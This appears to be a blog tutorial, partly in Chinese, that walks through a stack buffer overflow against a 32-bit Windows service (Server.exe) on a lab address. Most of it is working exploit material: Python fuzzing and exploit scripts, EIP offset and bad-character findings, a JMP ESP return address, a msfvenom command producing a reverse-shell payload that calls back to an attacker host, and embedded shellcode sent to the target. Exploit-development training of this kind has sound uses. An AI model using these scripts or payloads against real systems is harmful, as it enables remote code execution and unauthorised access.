Easy Windows Buffer Overflow

Easy Windows 32bit Buffer Overflow

  • Fuzz
  • Find EIP(offset)
  • Overwriting the EIP
  • Find Bad Characters
  • Find Return Address
  • Exploit

Fuzz

fuzz max

1
python3 -c "print('A' * 10000)" | nc 192.168.0.106 2233

缩小范围

1
2
python3 -c "print('A' * 2320)" | nc 192.168.0.106 2233
python3 -c "print('A' * 2318 + 'B' * 4)" | nc 192.168.0.106 2233

可以编写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import sys
import time
import socket


host = "192.168.0.106"
port = 2233
size = 100

while (size < 10000):
    try:
        data = "A" * size
        print "\n[*] Connent..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(8)
        s.connect((host, port))

        print "[*] Connect Done\n[*] Send buffer"
        s.send(data)
        print "[*] Buffer size {}".format(size)
        # print("[*] Buffer data : \n{}".format(data))
        print "[*] Buffer send Done"

        size += 100
        time.sleep(2)
        s.close()
    except KeyboardInterrupt:
        print "\n[!] Exit!"
        sys.exit(0)
    except Exception as e:
        print "\n[!] Find it!"
        print("[!]", e)
        sys.exit(0)

Out

1
2
3
4
5
6
7
[*] Connent...
[*] Connect Done
[*] Send buffer
[*] Buffer size 2400

[!] Find it!
[!] timed out

Find EIP (Finding the Offset)

msf-pattern_create -l 2400

1
echo -en "Aa0Aa1Aa2Aa3Aa4A...Cz0Cz1Cz2Cz3" | nc 192.168.0.106 2233

EIP 被覆盖: 39794338 , 得到 EIP 起始位置:2306

1
2
$ msf-pattern_offset -l 2400 -q 39794338
[*] Exact match at offset 2306

Overwriting the EIP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import sys
import socket


# EIP start : 0x39794338
offset    = "\x41" * 2306
EIP       = "\x42" * 4
shellcode = offset + EIP

host = "192.168.0.106"
port = 2233


try:
    print "\n[*] Connent..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    s.connect((host, port))
    print "[*] Connect Done\n[*] Send buffer"

    s.send(shellcode)
    print "[*] Buffer send Done"

    s.close()
except KeyboardInterrupt:
    print "[!] Exit!"
    sys.exit(0)
except Exception as e:
    print "\n[!] Error! \n[!] {}".format(e)
    sys.exit(0)

EIP 被 BBBB 覆盖: 42424242


Find Bad Characters

1
2
3
4
bad_chars = "\x01...\xff"
offset    = '\x41' * 2306
eip       = '\x42' * 4
shellcode = offset + eip + bad_chars

ESP: 0262EE54 -> dump

注意,检查 ESP 指向的内存区域的数据

1
2
3
4
5
6
7
8
9
10
11
12
0262EE44  41 41 41 41 42 42 42 42  AAAABBBB
0262EE4C  01 02 03 04 05 06 07 08  
0262EE54  09 0A 0B 0C 0D 0E 0F 10  ....
0262EE5C  11 12 13 14 15 16 17 18  
0262EE64  19 1A 1B 1C 1D 1E 1F 20  
0262EE6C  21 22 23 24 25 26 27 28  !"#$%&'(
0262EE74  29 2A 2B 2C 2D 2E 2F 30  )*+,-./0
0262EE7C  31 32 33 34 35 36 37 38  12345678
0262EE84  39 3A 3B 3C 3D 3E 3F 40  9:;<=>?@
0262EE8C  41 42 43 44 45 46 47 48  ABCDEFGH
0262EE94  49 4A 4B 4C 4D 4E 4F 50  IJKLMNOP
0262EE9C  00 41 41 41 41 41 41 41  .AAAAAAA     <- 51

Find Return Address

!mona modules : 列出 modules

ASM -> HEX

1
2
3
$ msf-nasm_shell 
nasm > JMP ESP
00000000  FFE4              jmp esp

寻找:JMP ESP

!mona find -s "\xff\xe4" -m Server.exe

or

!mona jmp -r esp

  • 0x1120110D

小端显示

1
2
3
echo "1120110D" | tac -rs .. | echo "$(tr -d '\n')"

# 0D112011

Exploit

生成 shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=443 EXITFUNC=thread -b "\x00\x51" -f c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import sys
import socket


# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -b "\x00\x51" -f c
shellcode = (
"\xda\xd2\xb8\x2c\x1e\xdd\x7b\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x38\xfc\x28\x87\xa8\x82"
"\xd3\x78\x28\xe3\x5a\x9d\x19\x23\x38\xd5\x09\x93\x4a\xbb\xa5"
"\x58\x1e\x28\x3e\x2c\xb7\x5f\xf7\x9b\xe1\x6e\x08\xb7\xd2\xf1"
"\x8a\xca\x06\xd2\xb3\x04\x5b\x13\xf4\x79\x96\x41\xad\xf6\x05"
"\x76\xda\x43\x96\xfd\x90\x42\x9e\xe2\x60\x64\x8f\xb4\xfb\x3f"
"\x0f\x36\x28\x34\x06\x20\x2d\x71\xd0\xdb\x85\x0d\xe3\x0d\xd4"
"\xee\x48\x70\xd9\x1c\x90\xb4\xdd\xfe\xe7\xcc\x1e\x82\xff\x0a"
"\x5d\x58\x75\x89\xc5\x2b\x2d\x75\xf4\xf8\xa8\xfe\xfa\xb5\xbf"
"\x59\x1e\x4b\x13\xd2\x1a\xc0\x92\x35\xab\x92\xb0\x91\xf0\x41"
"\xd8\x80\x5c\x27\xe5\xd3\x3f\x98\x43\x9f\xad\xcd\xf9\xc2\xbb"
"\x10\x8f\x78\x89\x13\x8f\x82\xbd\x7b\xbe\x09\x52\xfb\x3f\xd8"
"\x17\xe3\xdd\xc9\x6d\x8c\x7b\x98\xcc\xd1\x7b\x76\x12\xec\xff"
"\x73\xea\x0b\x1f\xf6\xef\x50\xa7\xea\x9d\xc9\x42\x0d\x32\xe9"
"\x46\x6e\xd5\x79\x0a\x5f\x70\xfa\xa9\x9f")


host    = "192.168.0.106"
port    = 2233

offset  = "\x41" * 2306
EIP     = "\x0D\x11\x20\x11"
nop     = "\x90" * 20
evilbuf = offset + EIP + nop + shellcode


try:
    print "\n[*] Connent..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((host, port))
    print "[*] Connect Done\n[*] Send buffer"

    s.send(evilbuf)
    print "[*] Buffer send Done"
    s.close()
except KeyboardInterrupt:
    print "\n[!] Exit!"
    sys.exit(0)
except Exception as e:
    print "\n[!] Error! \n[!] {}".format(e)
    sys.exit(0)

信息安全
BOF

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!